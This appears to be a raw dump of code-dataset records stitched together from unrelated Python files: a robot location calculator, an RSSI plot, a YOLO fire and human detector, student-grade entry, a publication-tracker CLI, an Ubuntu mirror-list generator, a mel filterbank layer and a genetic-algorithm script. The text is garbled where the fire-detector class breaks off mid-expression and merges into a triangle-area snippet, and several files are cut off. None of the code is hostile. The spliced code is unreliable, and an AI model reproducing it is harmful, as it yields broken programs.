threading.Lock()\n self.sensor_info = queue.Queue(5)\n\n self.server = server\n self.bind_map = None\n\n self.location_grd = LocationList(200,name='Guard',syncer=grd_location_syncer)\n self.location_sim = LocationList(200,name='Simulate',syncer=sim_location_syncer)\n LocationList.make_pair(self.location_grd, self.location_sim)\n\n # print(\"self.location_grd size =\",self.location_grd.size)\n # print(\"self.location_sim size =\",self.location_sim.size)\n\n self.update_lock = threading.Lock()\n self.need_recover = False\n\n self.location_log = queue.Queue(2000)\n\n # self.updata_thread stop with server's recv_thread stop\n self.update_thread=threading.Thread(target=self._location_update,args=())\n self.update_thread.daemon = True \n self.update_thread.start()\n\n self.start_timer = False\n self.time_list = {\"send\":-1,\"calc\":-1,\"sim\":-1}\n\n print(\"__init__ LocationCalculater end\")\n\n\n def _location_update(self):\n while True:\n recv_json = self.info_queue.get()\n self.system_update(recv_json)\n \n #todo if has simulate map update\n\n # if (self.start_timer):\n # if (self.time_list[\"calc\"]>0):\n # self.time_list[\"sim\"] = time.time()\n # self._print_delay()\n # self.start_timer = False\n \n if (self.server.is_shutdown()):break\n # print(1)\n # time.sleep(2)\n # print('end')\n \n def _print_delay(self):\n a,b,c = self.time_list['send'],self.time_list['calc'],self.time_list['sim']\n if (c-a > 0.2): \n s = \"delay: {:.6f} {}\".format(c-a,self.time_list)\n # warnings.warn(s,UserWarning)\n print(\"delay\\n\"*10)\n print(self.time_list)\n print(b-a,c-b,c-a)\n \n def bind_map_update(self):\n if self.bind_map:\n sim_irs_pos = self.location_sim.current_postion\n self.bind_map.update(sim_irs_pos.dict_style,self.start_timer,self.time_list[\"send\"])\n\n def switch_system_state(self,next_state:SystemState):\n self.location_grd.change_state(next_state)\n\n def get_sensor_group(self):\n sensor_data = [0,0,0,0]\n\n response_ids = []\n group_cnt=0\n\n while(not self.sensor_info.empty()):\n distance,need_location,term_id = self.sensor_info.get()\n group_cnt+=1\n \n for i in range(4):\n sensor_data[i] += distance[i]\n\n if need_location: response_ids.append(term_id)\n \n for i in range(4):\n sensor_data[i]/=group_cnt\n\n return sensor_data,response_ids\n\n def system_update(self, recv_json):\n term_id = recv_json['term_id']\n data_type = recv_json['type']\n info = recv_json['info']\n \n if data_type == \"SYSTEM_TYPE\":\n self.handle_system_data(info)\n return \n\n elif data_type == \"SENSOR_TYPE\":\n # print(recv_json)\n # 1) get 4 sensor\n sensor_info = [int(x) for x in info['sensor_info']]\n # 2) if has tag\n need_location = info['need_location']\n # 3) get send timestamp\n send_time = recv_json['send_time']\n\n if (need_location):\n print(\"[SNAPSHOT] need location_grd\\n\"*10) \n\n if (not self.start_timer and self.sensor_info.empty()): \n self.start_timer = True\n for k in self.time_list:\n self.time_list[k] = -1\n self.time_list[\"send\"] = send_time\n\n # 4) append sensor recv_json, if full advance once\n self.sensor_lock.acquire()\n\n self.sensor_info.put([sensor_info,need_location,term_id])\n if (self.sensor_info.full()):\n sensor_data,respond_ids = self.get_sensor_group()\n msg = []\n\n self.location_grd.advance_once(sensor_data,msg)\n\n if (self.start_timer):\n self.time_list[\"calc\"] = time.time()\n \n if (self.location_grd.is_unmovable):\n while (not self.query_queue.empty()):\n qid = self.query_queue.get()\n self.make_unmovable_reply(qid)\n\n for rid in respond_ids:\n self.make_snapshot_reply(rid)\n\n self.sensor_lock.release()\n\n #5) if has tag, should apply a msg \"SYSTEM_TYPE,ADJUST,on\"\n if need_location:\n self.switch_system_state(SystemState.ADJUST)\n return\n \n elif data_type == \"ACTION_TYPE\":\n self.handle_action_data(info)\n return \n\n elif data_type == \"ANGLE_TYPE\":\n self.handle_angle_data(info)\n return \n\n elif data_type == \"QUERY\":\n print(\"[QUERY] need location_grd\\n\"*1)\n # TODO set an threading reply by the first unmovable\n query_type = info['query_type']\n if (query_type=='position'):\n self.query_queue.put(term_id)\n elif (query_type=='system_state'):\n pass\n else:\n raise Exception(\"unknown query {}\".format(recv_json))\n\n elif data_type == \"SIMULATE\":\n self.location_sim.simulate_syncer_update(info)\n \n elif data_type == \"EOF\":\n print(\"shutdown\")\n self.server._shutdown = True\n return \n\n else:\n # unknown legal type\n raise Exception(\"Unknown data type {}\".format(recv_json))\n\n\n def handle_action_data(self,info):\n self.location_grd.set_action(info)\n pass\n\n def handle_angle_data(self,info):\n yaw_ground_angle=info['sdk_yaw_angle']\n self.location_grd.set_yaw_ground_angle(yaw_ground_angle)\n\n def handle_system_data(self,info):\n self.switch_system_state(SystemState[info['next_state']])\n\n def make_unmovable_reply(self,qid):\n assert(self.location_grd.is_unmovable)\n pos = self.location_grd.current_postion\n reply_json = {\n 'query_id': qid,\n 'type': 'position',\n 'info': {\n 'location_analysis': self.location_grd.location_analysis.name,\n 'x': pos.x,\n 'y': pos.y,\n 'deg': pos.deg,\n 'rad': math.radians(pos.deg)\n }\n }\n # print(\"reply_json\",reply_json)\n self.server._send_msg_queue.put(reply_json)\n\n def make_snapshot_reply(self,qid):\n # assert(self.location_grd.is_unmovable)\n pos = self.location_grd.current_postion\n reply_json = {\n 'query_id': qid,\n 'type': 'snapshot',\n 'info': {\n 'location_analysis': self.location_grd.location_analysis.name,\n 'x': pos.x,\n 'y': pos.y,\n 'deg': pos.deg,\n 'rad': math.radians(pos.deg)\n }\n }\n self.server._send_msg_queue.put(reply_json)\n \n","repo_name":"mxy161610207/cpscps_testbed","sub_path":"testbed_platform/location/location_calculater.py","file_name":"location_calculater.py","file_ext":"py","file_size_in_byte":7629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15324256090","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nfrom matplotlib.animation import FuncAnimation\n\npath = './data/E3/E34'\n\ndef animate(i):\n data1 = pd.read_csv(path+'/data1.csv')\n data2 = pd.read_csv(path+'/data2.csv')\n data1 = data1.tail(100)\n data2 = data2.tail(100)\n x1 = data1['x_value']\n y1 = data1['sender_rssi']\n x2 = data2['x_value']\n y2 = data2[\"sender_rssi\"]\n\n\n plt.cla() #clear the axis\n\n plt.plot(x1, y1, label='Sender 1')\n plt.plot(x2, y2, label='Sender 2')\n plt.ylabel('RSSI')\n plt.xlabel('Packet Number')\n plt.legend(loc='upper left')\n plt.tight_layout()\n\nani = FuncAnimation(plt.gcf(), animate, interval=1000)\n\nplt.tight_layout()\nplt.show()\n","repo_name":"wbechkit/dronmap","sub_path":"Python/animate.py","file_name":"animate.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37411902687","text":"import torch\n\nclass ImageAnalyzer:\n \"\"\"\n this class is used to detect fire in an image as well as the existence of\n human through this fire\n \"\"\"\n \n def __init__(self, path_to_yolo= \"./yolov5\",\n path_to_fire_model=\"./yolov5/models/fire.pt\", \n path_to_yolo_model = \"./yolov5/models/yolov5n.pt\",\n fire_confidence = 0.4,\n yolo_confidence = 0.6):\n \"\"\"\n initializes the models for detection\n Make sure to load the image first thing using load_image\n \"\"\"\n self._fire_model = torch.hub.load(path_to_yolo, \"custom\", \n path= path_to_fire_model, \n source=\"local\")\n self._yolo_model = torch.hub.load(path_to_yolo,\"custom\",\n path=path_to_yolo_model, \n source=\"local\")\n self.image = None\n self.image_width = None\n self.image_height = None\n self._fire_confidence = fire_confidence\n self._generic_confidence = yolo_confidence\n \n def load_image(self, img_source, width, height):\n \"\"\"\n this method loads the image from a file or PIL (python image library) image object \n and specify its width and height\n\n this method needs to be invoked first to tell the model which image to work on\n \"\"\"\n self.image = img_source\n self.image_width = width\n self.image_height = height\n return self\n\n def get_fire_model(self):\n \"\"\"\n Do not touch\n gets the yolov5 fire model that is trained for detecting fires\n \"\"\"\n return self._fire_model\n\n def get_generic_model(self):\n \"\"\"\n Do not touch\n gets the yolov5 detection model that is trained for detecting objects and humans\n \"\"\"\n return self._yolo_model\n\n def is_fire_detected(self):\n \"\"\"\n this method tells u whether there is a fire in the image that you loaded earlier\n returns true or false\n \"\"\"\n if self.image is None:\n return False\n if self._fire_model is None:\n return False\n if self.detect_fire() is not None:\n return True\n return False\n\n def detect_fire(self):\n \"\"\"\n Do Not touch\n This method is used internally to run the fire detection\n returns data that is understandable by the functions that are utilizing it\n not human readable.\n\n If curious please refer to the documentation of YOLOv5\n \"\"\"\n if self.image is None:\n return None\n if self._fire_model is None:\n return None\n data_frame = self._fire_model(self.image).pandas().xyxy[0]\n filtered_data_frame = (data_frame[ data_frame[\"confidence\"]> self._fire_confidence ])\n if filtered_data_frame.shape[0] > 0:\n return filtered_data_frame.iloc[0]\n else:\n return None\n\n def is_human_detected(self):\n \"\"\"\n this method tells u whether there is a human in the image that you loaded earlier\n returns true or false\n \"\"\"\n if self.image is None:\n return False\n if self._yolo_model is None:\n return False\n if self.detect_human() is not None:\n return True\n return False\n\n def detect_human(self):\n \"\"\"\n Do Not touch\n This method is used internally to run the fire detection\n returns data that is understandable by the functions that are utilizing it\n not human readable.\n\n If curious please refer to the documentation of YOLOv5\n \"\"\"\n if self.image is None:\n return None\n if self._yolo_model is None:\n return None\n data_frame = self._yolo_model(self.image).pandas().xyxy[0]\n filtered_data_frame = (data_frame[ data_frame[\"confidence\"]> self._generic_confidence ])\n if filtered_data_frame.shape[0] > 0:\n return filtered_data_frame.iloc[0]\n else:\n return None\n\n def get_center(self, xmin,ymin,xmax,ymax):\n \"\"\"\n internal function that calculates the center given coordinates\n \"\"\"\n return (xmin + (xmax-xmin)/2), (ymin+(ymax - ymin)/2)\n\n def find_quadrant(self, x,y):\n \"\"\"\n This method is utilized internally do not edit\n \"\"\"\n if self.image_width/2 < x:\n # right quadrants 1,4\n if self.image_height/2 0 and tinggi > 0:\r\n luas = round(0.5 * alas * tinggi)\r\n print(luas)\r\nelse:\r\n print(\"Alas dan tinggi harus > 0\")","repo_name":"IvanLeovandi/Praktikum-Dasar-Pemrograman-2021-2022","sub_path":"Praktikum 5/segitiga.py","file_name":"segitiga.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42200723966","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jul 17 09:20:18 2019\n\n@author: jyothyrajs\n\"\"\"\nfrom array import array as arr\n\ndef findSecLargest(a , n):\n l = a[0]\n sl = a[0]\n if(sl > l):\n l = sl\n sl = a[0]\n \n for i in range(1,n):\n x = a[i]\n if( x > l ):\n sl = l\n l = x\n elif ( x > sl ):\n sl = x\n print('Second Largest: ',sl)\n \ndef secLargestArray( ):\n print('No of Elements:')\n n = int(input())\n a = arr('i')\n print('Elements: ')\n for i in range( 0, n ):\n x = int(input())\n a.append(x)\n findSecLargest(a , n)\n \n \ndef main():\n secLargestArray()\n\nmain()","repo_name":"Jyothyrajs/Python","sub_path":"seLargArray.py","file_name":"seLargArray.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22264023000","text":"print('enter your academic details')\nprint('\\n')\nstudent_details = {}\nsize = int(input('enter the size of the dictionary: '))\nfor i in range(size):\n name = str(input('enter student name: '))\n Reg_number = str(input('enter stdudent registration number: '))\n age = int(input('enter student age: '))\n program = str(input('enter student program: '))\n year_of_study = int(input('enter student year of study'))\n subject = {}\n for i in range(1):\n subject1 = str(input('enter the first subject: '))\n subject2 = str(input('enter the second subject: '))\n subject3 = str(input('enter the third subject: '))\n subject4 = str(input('enter the fourth subject: '))\n subject['subject1'] = subject1\n subject['subject2'] = subject2\n subject['subject3'] = subject3\n subject['subject4'] = subject4\n scores = {}\n for i in range(1):\n marks1 = int(input('enter marks for subject1: '))\n marks2 = int(input('enter marks for subject2: '))\n marks3 = int(input('enter marks for subject3: '))\n marks4 = int(input('enter marks for subject4: '))\n scores['marks1'] = marks1\n scores['marks2'] = marks2\n scores['marks3'] = marks3\n scores['marks4'] = marks4\n grades = {} \n for i in range(1): \n grade1 = str(input('enter the grade for marks1: ')) \n grade2 = str(input('enter the grade for marks2: '))\n grade3 = str(input('enter the grade for marks3: '))\n grade4 = str(input('enter the grade for marks4: '))\n grades['grade1'] = grade1\n grades['grade2'] = grade2\n grades['grade3'] = grade3\n grades['grade4'] = grade4\n student_details[Reg_number] = {\n 'name': name,\n 'age' : age,\n 'program': program,\n 'year of study' : year_of_study,\n 'subjects' : subject,\n 'scores' : scores,\n 'grade' : grades\n }\nprint(student_details) \n","repo_name":"OgwangOsbornmark/studentresults","sub_path":"studentresults.py","file_name":"studentresults.py","file_ext":"py","file_size_in_byte":1973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8747302970","text":"#!/usr/bin/env python #\r\n# -*- coding: UTF-8 -*-\r\n\r\nimport wsgiref.handlers\r\nimport sys\r\n\r\nsys.path.append('modules')\r\nsys.path.append('models')\r\n\r\nfrom helloblog import *\r\n\r\nclass IntrepidSourceList(HelloBlog):\r\n def initialize(self,request,response):\r\n HelloBlog.initialize(self,request,response)\r\n\r\n self.mirrors={\r\n 'Archive.ubuntu.com更新服务器(欧洲,此为官方源,电信网通用户使用)':'http://archive.ubuntu.com/ubuntu/',\r\n 'Ubuntu.cn99.com更新服务器(江苏省常州市电信,推荐电信用户使用)':'http://ubuntu.cn99.com/ubuntu/',\r\n 'Mirrors.shlug.org更新服务器':'http://cn.archive.ubuntu.com/ubuntu',\r\n 'Mirror.lupaworld.com更新服务器(浙江省杭州市双线服务器)':'http://mirror.lupaworld.com/ubuntu',\r\n '厦门大学更新服务器(教育网服务器)':'ftp://ubuntu.realss.cn/ubuntu/',\r\n '成都市 电子科技大学更新服务器(教育网,推荐校园网和网通用户使用)':'http://ubuntu.uestc.edu.cn/ubuntu/',\r\n '成都市 电子科技大学更新服务器2':'http://ubuntu.dormforce.net/ubuntu/',\r\n '上海市上海交通大学更新服务器(教育网,推荐校园网和网通用户使用)':'http://ftp.sjtu.edu.cn/ubuntu/',\r\n '中国科学技术大学更新服务器(教育网,推荐校园网和网通用户使用)':'http://debian.ustc.edu.cn/ubuntu/',\r\n '中国台湾 台湾大学更新服务器':'http://ubuntu.csie.ntu.edu.tw/ubuntu/',\r\n 'mirror.rootguide.org更新服务器(上海市 电信)':'http://mirror.rootguide.org/ubuntu/',\r\n '台湾的官方源速度也相当不错,有时甚至快于内地的':'http://tw.archive.ubuntu.com/ubuntu'\r\n }\r\n\r\n self.mirror_url=[\r\n 'deb %s intrepid main restricted universe multiverse',\r\n 'deb %s intrepid-security main restricted universe multiverse',\r\n 'deb %s intrepid-updates main restricted universe multiverse',\r\n 'deb %s intrepid-backports main restricted universe multiverse',\r\n 'deb %s intrepid-proposed main restricted universe multiverse',\r\n ]\r\n\r\n self.mirror_src_url = [\r\n 'deb-src %s intrepid main restricted universe multiverse',\r\n 'deb-src %s intrepid-security main restricted universe multiverse',\r\n 'deb-src %s intrepid-updates main restricted universe multiverse',\r\n 'deb-src %s intrepid-backports main restricted universe multiverse',\r\n 'deb-src %s intrepid-proposed main restricted universe multiverse',\r\n ]\r\n \r\n def get(self):\r\n mirrors = []\r\n for key in self.mirrors.keys():\r\n mirrors.append(key)\r\n \r\n self.template_values = {\r\n 'mirrors':mirrors,\r\n 'IncludeSource':True,\r\n 'Output':''\r\n }\r\n\r\n self.render('templates/IntrepidSource.html')\r\n\r\n def post(self):\r\n iSel = self.param('mirror_id')\r\n\r\n include_src = self.param('include_src')\r\n\r\n \r\n mirrors = []\r\n\r\n mirror = self.mirrors[iSel.encode('utf8')]\r\n\r\n output = []\r\n \r\n for deb_url in self.mirror_url:\r\n output.append( deb_url % (mirror))\r\n\r\n if include_src == 'True':\r\n for deb_url in self.mirror_src_url:\r\n output.append( deb_url % ( mirror ))\r\n\r\n result = '#Ubuntu APT Source for %s ' % ( iSel ) + '\\n'\r\n result = result + '#Generate from http://superwar3fan.appsoot.com/Intrepid' + '\\n'\r\n result = result + '#Author Mail: gm8pleasure@gmail.com' + '\\n'\r\n result = result + '\\n'\r\n\r\n for o in output:\r\n result = result+o+'\\n'\r\n \r\n for key in self.mirrors.keys():\r\n mirrors.append(key)\r\n \r\n self.template_values = {\r\n 'mirrors':mirrors,\r\n 'IncludeSource':True,\r\n 'Output': result\r\n }\r\n self.render('templates/IntrepidSource.html')\r\n\r\ndef main():\r\n application = webapp.WSGIApplication([\r\n ('/Intrepid', IntrepidSourceList),\r\n ('/Intrepid/SourceGen', IntrepidSourceList), \r\n ],\r\n debug=True)\r\n wsgiref.handlers.CGIHandler().run(application)\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"camark/entprj","sub_path":"Intrepid.py","file_name":"Intrepid.py","file_ext":"py","file_size_in_byte":3988,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21988787618","text":"from typing import Optional\nfrom structures import ListNode\n\nclass Solution:\n def reverseList(self, head: Optional[ListNode]) -> Optional[ListNode]:\n cur, prv = head, None\n while cur:\n nxt = cur.next\n cur.next = prv\n prv = cur\n cur = nxt\n return prv\n\n\nif __name__ == \"__main__\":\n solution = Solution()\n head = ListNode(1)\n head.next = ListNode(2)\n head.next.next = ListNode(3)\n head.next.next.next = ListNode(4)\n head.next.next.next.next = ListNode(5)\n\n result = solution.reverseList(head)\n\n while result:\n print(result.val)\n result = result.next\n\n\n\n\n","repo_name":"jinsDevelopment/Algorithm-Study","sub_path":"02-LinkedList/reverseLinkedList.py","file_name":"reverseLinkedList.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12711833002","text":"#!/usr/local/bin/python3\n\"\"\"PubSpork is a utility that helps you manage and track publications.\n\nIt was created by @tnabtaf to help track papers that reference\n@galaxyproject. However, it should be useful to manage any pubs that\nreference anything.\n\nSee README.md for more.\n\"\"\"\n\nimport argparse\n\nimport alert_sources\nimport lib_types\nimport report_formats\nimport generate_lib_report\nimport match_pubs\n\n\ndef get_args():\n \"\"\"Parse and return the command line arguments.\"\"\"\n\n arg_parser = argparse.ArgumentParser(\n description=(\n \"PubSpork helps manage and track publications. \"\n + \"It contains two main functions: \"\n + \"1) Supporting curation of newly reported publications. \"\n + \"2) Library reporting. \"\n + \"**Supporting Curation**: \"\n + \"The --match function is used to combine: \"\n + \" a) a DB of publications we have already looked at. \"\n + \" b) a library (currently in Zotero or CiteULike) of pubs \"\n + \" that have already been identified as relevant. \"\n + \" c) A set of publication alerts. \"\n + \"into an HTML page containing all newly report publications \"\n + \"and links to those publications to help curate them. \"\n + \"**Library Reporting**: \"\n + \"The --report function generated the selected library report.\"))\n\n arg_parser.add_argument(\n \"--match\", required=False, action=\"store_true\",\n help=(\n \"Match newly reported pubs with each other and with optional \"\n + \"libraries of already curated pubs. Generates an HTML page \"\n + \"that to use to curate the new pubs.\"))\n arg_parser.add_argument(\n \"--report\", required=False, action=\"store_true\",\n help=(\n \"Generate a library report.\"))\n\n common_args = arg_parser.add_argument_group(\n title=\"Common arguments\", description=None)\n common_args.add_argument(\n \"--libtype\", required=True,\n help=(\n \"What type of of 'already accepted pubs' library are we reading \"\n + \"in and updating? Options are \"\n + lib_types.get_lib_types_as_text_list() + \".\"))\n common_args.add_argument(\n \"--inputlibpath\", required=True,\n help=(\n \"Path to the library of already accepted pubs. This is typically \"\n + \"exported from the library service.\"))\n common_args.add_argument(\n \"--onlineliburl\", required=True,\n help=(\n \"Base URL of the online version of the library of already \"\n + \"accepted pubs. Used to generate links.\"))\n\n match_args = arg_parser.add_argument_group(\n title=\"Match arguments\", description=None)\n match_args.add_argument(\n \"--email\", required=False,\n help=(\n \"Email account to pull new pub alerts from.\"))\n match_args.add_argument(\n \"--mailbox\", required=False,\n help=(\n \"Optional mailbox within email account to limit notifications \"\n + \"from.\"))\n match_args.add_argument(\n \"--imaphost\", required=False,\n help=(\n \"Address of --email's IMAP server. For GMail this is \"\n + \"imap.gmail.com.\"))\n match_args.add_argument(\n \"--since\", required=False,\n help=(\n \"Only look at alerts from after this date. \"\n + \"Format: DD-Mmm-YYYY. Example: 01-Dec-2014.\"))\n match_args.add_argument(\n \"--before\", required=False,\n help=(\n \"Optional. Only look at alerts before this date. \"\n + \"Format: DD-Mmm-YYYY. Example: 01-Jan-2015.\"))\n match_args.add_argument(\n \"--sources\", required=False,\n help=(\n \"Which alert sources to process. Is either 'all' or a \"\n + \"comma-separated list (no spaces) from these sources: \"\n + alert_sources.get_alert_sources_as_text_list()))\n match_args.add_argument(\n \"--proxy\", required=False,\n help=(\n \"String to insert in URLs to access pubs through your paywall. \"\n + \"For Johns Hopkins, for example, this is: \"\n + \"'.proxy1.library.jhu.edu'\"))\n match_args.add_argument(\n \"--proxyseparator\", required=False,\n help=(\n \"Some proxies replace dots in the original pub URL with dashes. \"\n + \"Default is dots.\"),\n choices=['dot', 'dash'], default=\"dot\")\n match_args.add_argument(\n \"--customsearchurl\", required=False,\n help=(\n \"URL to use for custom searches at your institution. The title \"\n + \"of the publication will be added to the end of this URL.\"))\n match_args.add_argument(\n \"--knownpubsin\", required=False,\n help=(\n \"Path to existing known pubs DB. This is the list of publications \"\n + \"you have already looked at. Typically generated from the \"\n + \"previous PubSpork run. In TSV format.\"))\n match_args.add_argument(\n \"--knownpubsout\", required=False,\n help=\"Where to put the new known pubs DB (in TSV format).\")\n match_args.add_argument(\n \"--okduplicatetitles\", required=False,\n help=(\n \"Text file containing duplicate titles that have been reviewed \"\n + \"and are in fact not duplicate titles. These will not get \"\n + \"reported as duplicates.\"))\n match_args.add_argument(\n \"--excludesearches\", required = False,\n help=(\n \"Exclude searches look for matches that we want to exclude \"\n + \"from our results. These are useful because it is sometimes \"\n + \"easier to list each exclude search, each in a separate search \"\n + \"then to include all the excludes in each search (and \"\n + \"sometimes we can't make the search that long).\"))\n match_args.add_argument(\n \"--curationpage\", required=False,\n help=(\n \"Where to put the HTML page listing all the pubs. Required for \"\n + \" match runs.\"))\n\n report_args = arg_parser.add_argument_group(\n title=\"Report arguments\", description=None)\n report_args.add_argument(\n \"--reportformat\", required=False,\n help=(\n \"What format to generate the report in. Options are \"\n + report_formats.get_formats_as_text_list()\n + \".\"))\n arg_parser.add_argument(\n \"--journal\", required=False, action=\"store_true\",\n help=\"Produce table showing number of papers in different journals.\")\n arg_parser.add_argument(\n \"--year\", required=False, action=\"store_true\",\n help=\"Produce table showing number of papers published each year.\")\n report_args.add_argument(\n \"--tagyear\", required=False, action=\"store_true\",\n help=(\n \"Produce table showing number of papers with each tag, \"\n + \"each year.\"))\n report_args.add_argument(\n \"--yeartag\", required=False, action=\"store_true\",\n help=(\n \"Produce table showing number of papers with each year, \"\n + \"each tag.\"))\n report_args.add_argument(\n \"--tagcountdaterange\", required=False, action=\"store_true\",\n help=(\n \"Produce table showing number of papers that were tagged with \"\n + \"each tag during a given time period. --entrystartdate and \"\n + \"--entryenddate parameters are required if --tagcountdaterange \"\n + \"is specified.\"))\n report_args.add_argument(\n \"--pubsdaterange\", required=False, action=\"store_true\",\n help=(\n \"Produce list of publications in the given date range. What is \"\n + \"included depends on the --reportformat. --entrystartdate and \"\n + \"--entryenddate parameters are required if --pubsdaterange \"\n + \"is specified.\"))\n report_args.add_argument(\n \"--entrystartdate\", required=False,\n help=(\n \"--tagcountdaterange will report on papers with entry dates \"\n + \"greater than or equal to this date. Example: 2016-12-29. \"))\n report_args.add_argument(\n \"--entryenddate\", required=False,\n help=(\n \"--tagcountdaterange will report on papers with entry dates \"\n + \"less than or equal to this date. Example: 2017-01-29. \"))\n report_args.add_argument(\n \"--onlythesetags\", required=False,\n help=(\n \"Can either generate a report about all tags in the library, \"\n + \"or, only about a subset of tags. If this parameter is given \"\n + \"then only the tags listed in this file will be reported on. \"\n + \"List one tag per line.\"))\n report_args.add_argument(\n \"--numtagcolumngroups\", required=False, type=int, default=4,\n help=(\n \"Specifies how many tags (and their counts) should be listed \"\n + \"in each row of a tag report. Default is 4.\"))\n\n args = arg_parser.parse_args()\n\n if args.match:\n # split comma separated list of sources\n args.sources = args.sources.split(\",\")\n\n return args\n\n\nargs = get_args()\n\nif args.match:\n match_pubs.match_pubs(args)\nelif args.report:\n generate_lib_report.generate_lib_report(args)\n","repo_name":"tnabtaf/pub_spork","sub_path":"pub_spork.py","file_name":"pub_spork.py","file_ext":"py","file_size_in_byte":9232,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"10089618418","text":"import tensorflow as tf\nimport tensorflow_addons as tfa\n\nclass MelFilterbanks(tf.keras.layers.Layer):\n def __init__(self,\n n_filters = 64,\n sample_rate = 16000,\n n_fft = 512,\n window_len = 25.,\n window_stride = 10.,\n min_freq = 60.0,\n max_freq = 7800.0,\n **kwargs):\n super().__init__(**kwargs)\n\n self._n_filters = n_filters\n self._sample_rate = sample_rate\n self._n_fft = n_fft\n self._window_len = int(sample_rate * window_len // 1000 + 1)\n self._window_stride = int(sample_rate * window_stride // 1000)\n self._min_freq = min_freq\n self._max_freq = max_freq if max_freq else sample_rate / 2.\n\n self.mel_filters = tf.signal.linear_to_mel_weight_matrix(\n num_mel_bins=self._n_filters,\n num_spectrogram_bins=self._n_fft // 2 + 1,\n sample_rate=self._sample_rate,\n lower_edge_hertz=self._min_freq,\n upper_edge_hertz=self._max_freq)\n\n def call(self, inputs: tf.Tensor) -> tf.Tensor:\n if inputs.shape.ndims == 3:\n if inputs.shape[-1] != 1:\n raise ValueError(\"Only one channel supported but got inputs\"\n f\" with shape {inputs.shape}\")\n inputs = tf.squeeze(inputs, axis=-1)\n\n stft = tf.signal.stft(\n inputs,\n frame_length=self._window_len,\n frame_step=self._window_stride,\n fft_length=self._n_fft,\n pad_end=True)\n\n spectrogram = tf.math.square(tf.math.abs(stft))\n mel_filterbanks = tf.matmul(spectrogram, self.mel_filters)\n mel_filterbanks = tf.math.log(mel_filterbanks + 1e-5)\n return mel_filterbanks\n","repo_name":"Zaharah/ood_audio","sub_path":"melfb.py","file_name":"melfb.py","file_ext":"py","file_size_in_byte":1576,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"20926382946","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jun 13 14:13:07 2021\n\n@author: 577\n\"\"\"\n\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\nfrom sko.GA import GA\n\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import MinMaxScaler\n\nimport pandas as pd\nimport numpy as np\n\nimport cv2\nimport matplotlib.pyplot as plt\n\nimport win32con\nimport win32gui\nimport win32com.client\n\nimport pyautogui\n\nfrom PyQt5.QtWidgets import QApplication\nfrom PyQt5.QtGui import *\n\nimport requests\nimport json\n\nimport sys\nimport time\nimport os\nimport random\nimport warnings\n\n\nshell = win32com.client.Dispatch(\"WScript.Shell\")\nshell.SendKeys('%')\n\n#avoiding warning\n\nwarnings.filterwarnings(\"ignore\")\n\n#reproduct\n\nseed = 577\n\nnp.random.seed(seed)\nrandom.seed(seed)\n\ntorch.manual_seed(seed)\ntorch.cuda.manual_seed(seed)\ntorch.cuda.manual_seed_all(seed)\n\ntorch.backends.cudnn.benchmark = True\ntorch.backends.cudnn.deterministic = True\n\n\n\ndef opt_L():\n \n ga = GA(func=opt_min_L, n_dim=1, size_pop=20, max_iter=20, lb=[1.1], ub=[5], precision=1e-7)\n \n best_x, best_y = ga.run()\n \n print('best_x:', best_x, '\\n', 'best_y:', best_y)\n\n return best_x, best_y\n\ndef opt_R():\n \n ga = GA(func=opt_min_R, n_dim=1, size_pop=20, max_iter=20, lb=[1.1], ub=[5], precision=1e-7)\n \n best_x, best_y = ga.run()\n \n print('best_x:', best_x, '\\n', 'best_y:', best_y)\n\n return best_x, best_y\n\n\ndef opt_min_L(x):\n \n global var_L_G\n global var_L_P\n \n global G\n global P\n \n # input: GHPLC(0) GCOUNTER(T) GSET(T+1) BCOUNTER(T) B(T)-B(T-2) \n \n # output: GHPLC(T+1) PDOHPLC(T+1)\n \n core_net = core_init(0)\n \n LX2 = LX1 + (x[0]*5)*2.1\n \n tmp_x = np.array([[LX0,LX1,LX2,LX3,LX4]])\n \n tmp_x = core_1_minMax_input.transform(tmp_x)\n \n tmp_x = torch.Tensor(tmp_x)\n \n tmp_x = torch.unsqueeze(tmp_x,dim=1)\n \n y = core_net(tmp_x).detach().numpy()\n \n G = core_1_minMax_output.inverse_transform(np.array([[y[0,0,0],y[0,0,1]]]))[0,0]\n \n P = core_1_minMax_output.inverse_transform(np.array([[y[0,0,0],y[0,0,1]]]))[0,1]\n \n core_net = core_init(0.1)\n \n result = (G-10)**2 + 50*(1/(P+1))**2\n \n print(G)\n \n print(P)\n\n\n return result\n\n\ndef opt_min_R(x):\n \n global var_R_G\n global var_R_P\n \n global G\n global P\n \n \n # input: GHPLC(0) GCOUNTER(T) GSET(T+1) BCOUNTER(T) B(T)-B(T-2) \n \n # output: GHPLC(T+1) PDOHPLC(T+1)\n \n core_init(0)\n \n RX2 = RX1 + (x[0]*5)*(62/30)\n \n tmp_x = np.array([[RX0,RX1,RX2,RX3,RX4]])\n \n tmp_x = core_1_minMax_input.transform(tmp_x)\n \n tmp_x = torch.Tensor(tmp_x)\n \n tmp_x = torch.unsqueeze(tmp_x,dim=1)\n \n y = core_net(tmp_x).detach().numpy()\n \n G = core_1_minMax_output.inverse_transform(np.array([[y[0,0,0],y[0,0,1]]]))[0,0]\n \n P = core_1_minMax_output.inverse_transform(np.array([[y[0,0,0],y[0,0,1]]]))[0,1]\n \n 